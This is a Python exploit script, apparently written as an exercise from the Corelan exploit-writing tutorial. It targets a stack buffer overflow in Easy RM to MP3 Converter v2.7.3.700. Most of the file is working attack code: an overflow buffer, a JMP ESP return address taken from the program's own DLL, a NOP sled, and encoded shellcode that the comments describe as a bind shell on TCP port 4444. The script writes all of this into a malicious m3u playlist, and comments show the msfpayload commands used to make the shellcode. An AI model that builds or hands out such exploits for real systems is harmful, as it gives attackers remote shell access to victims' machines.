exploi_5M7X_easyRM2MP3.py

#!/usr/bin/python

# need the struct-libs for little-endian packing
import struct

# some fancy ascii-stuff (as adviced in corelans tutorial ;P)
print """                        ______                      ____
                       /     /__ ___       ____    /   /___
               __ ____/     //  /  _\______\_  \  /   //  /_
             __\ \\    .____//      \_____   /   \/   //  //
              o/  0\____  \/  \ /   \__    /\       /0  /o
            _//__//_______/____Y_____\    / /___/\  \\__\\_
       <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>"""

print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-"
print "\n corelan tutorial part1 - smtx.2010"
print " greets 2 back-track-community and CORELAN"

# building the buffer 26059 bytes till eip (depends on the path where the m3u is stored)
preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4)  # pre buffer to reach saved EIP

# overwrite saved EIP with a JMP-ESP
# Address=01D0F23A
# Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll)
eip = struct.pack('<i', 0x1D0F23A)     # eip

# this is to stuff another 4 bytes because of the "calling"-conventions mentioned
# here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1
# and there -> http://en.wikipedia.org/wiki/X86_calling_conventions
# there are 4 bytes between ESP and our shellcode so we need this to make
# ESP pointing onto your shellcode
pad = 'FUCK'

# i make a little nopsled just to be sure of "weird" stuff to happen
nopsled = '\x90' * 10

# BADCAHRS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR
# size for shellcode is 3937 (not tested) at least enough for what we want
# testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
# this is a bind-shell-code listening on TCP-Port:4444
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
shcode = (
"\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1"
"\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2"
"\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e"
"\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f"
"\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1"
"\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71"
"\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81"
"\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed"
"\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f"
"\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a"
"\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd"
"\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18"
"\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3"
"\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6"
"\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a"
"\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12"
"\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34"
"\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c"
"\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c"
"\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e"
"\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67"
"\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79"
"\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd"
"\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9"
"\x47\x57\x93\xbf\x67\xc4\x94\x95\x62"
)

trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) )

# lets put the attack-buffer together
buffer = (preeip + eip + pad + nopsled + shcode + trigger)

# open and write evil buffer into m3u-playlist
print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist"
f = open('pwn_easyRM.m3u', 'w')
f.write(buffer)
f.close()
print "   [x] done\n"

# eof